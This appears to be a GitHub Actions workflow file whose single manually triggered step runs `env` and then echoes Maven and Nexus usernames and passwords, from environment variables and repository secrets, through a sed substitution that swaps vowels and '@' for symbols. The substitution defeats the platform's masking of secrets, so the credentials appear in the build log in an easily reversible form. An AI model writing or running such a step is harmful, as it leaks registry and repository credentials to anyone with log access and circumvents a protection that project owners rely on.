name: Investigate
on:
  workflow_dispatch:

jobs:
  show:
    runs-on: ubuntu-latest
    steps:
      - name: record
        run: |
          env
          echo ${MAVEN_USERNAME} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g' - Maven U
          echo ${MAVEN_PASSWORD} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g' - Maven P
          echo ${{ secrets.NEXUS_USERNAME }} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g' - Nexus U-1
          echo ${{ secrets.NEXUS_PASSWORD }} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g' - Nexus P-1
          echo ${NEXUS_USERNAME} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g' - Nexus U-2
          echo ${NEXUS_PASSWORD} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g' - Nexus P-2
